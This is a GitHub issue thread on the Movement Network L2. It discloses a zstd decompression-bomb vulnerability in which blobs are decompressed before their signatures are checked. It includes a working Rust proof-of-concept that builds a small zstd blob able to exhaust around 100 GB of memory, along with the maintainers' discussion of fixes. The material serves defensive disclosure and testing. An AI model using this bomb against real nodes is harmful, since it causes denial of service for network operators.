movementlabsxyz / movement

The Movement Network is a Move-based L2 on Ethereum.
Apache License 2.0
82 stars 66 forks source link

(OTS) Zstd Bomb Blob #876

Open l-monninger opened 5 days ago

l-monninger commented 5 days ago

Summary

A malicious user may post a zstd bomb (a small compressed blob which decompresses to a huge buffer) as a blob on the movement Celestia namespace. Even though blob data is checked to be signed, zstd decompression happens before the signature checks. This is done with the zstd::decode_all(blob.data) function, which has no limits on the decompressed size of the blob. Even with Celestia’s 2 MB blob size limit, we were able to produce a PoC that uses approximately 100 GB of RAM on decompression.

l-monninger commented 5 days ago

@khokho

mzabaluev commented 4 days ago

Should we impose some constant size limit on IR blobs, or should it be a chain parameter?

l-monninger commented 4 days ago

Should we impose some constant size limit on IR blobs, or should it be a chain parameter?

Yes, but we also want to change the order of operations s.t. we are checking signatures on compressed blobs. That way we know honest signers are involved or not.

Even with a supposed limit on IR blobs, we can still get bombed. But, later on, we can perhaps entertaining slashing signers that bomb.

Ideally, we would also want to just have a way to catch bombing behavior and ignore said blob. For example, I think you can use maxWindowSize() in zstd to accomplish this, i.e., set the max decompressable size, but not sure.

l-monninger commented 4 days ago

@khokho, can you share over your bomb s.t. we can write tests against it.

khokho commented 4 days ago

@l-monninger Here's the PoC:

fn zstd_bomb() {
    // MAGIC + header with max window size
    let mut b: Vec<u8> = vec![0x28, 0xb5, 0x2f, 0xfd, 0x0, 0x7f];
    let n_blocks = 0x530000;
    for _ in 0..n_blocks {
        // RLE block encoding 0xff byte repeated 0x8000 times
        b.extend(&[0x02, 0x00, 0x10, 0xff]);
    }
    // Block to finish the data
    b.extend(&[0x01, 0x00, 0x00]);
    // Check that we fit in celestia limits
    assert!(b.len() < 0x1_500_000);
    // decode the bomb
    // uses up at lest 100GB on my machine after which it crashes
    let res = zstd::decode_all(b.as_slice()).unwrap();
    dbg!(res.len());
}
mzabaluev commented 4 days ago

To me it boils down to two approaches:

  1. Change the format so that the compression layer does not get applied to the signature, and use the signature to sign/verify the compressed payload. Keep relying on Celestia's innate limit to limit the size of compressed blobs.
  2. Impose a limit on the size of decoded blobs and pass it to the zstd decoder.
l-monninger commented 4 days ago

@mzabaluev Yeah, that's what I would say.

mzabaluev commented 3 days ago

We have the maximum block size parameter in memseq configuration, but it's in the number of transactions.

  1. Is this enough information to derive the upper bound on the size of an uncompressed blob?
  2. This parameter governs the blobs that the node creates. Can we also apply it to blobs received from DA?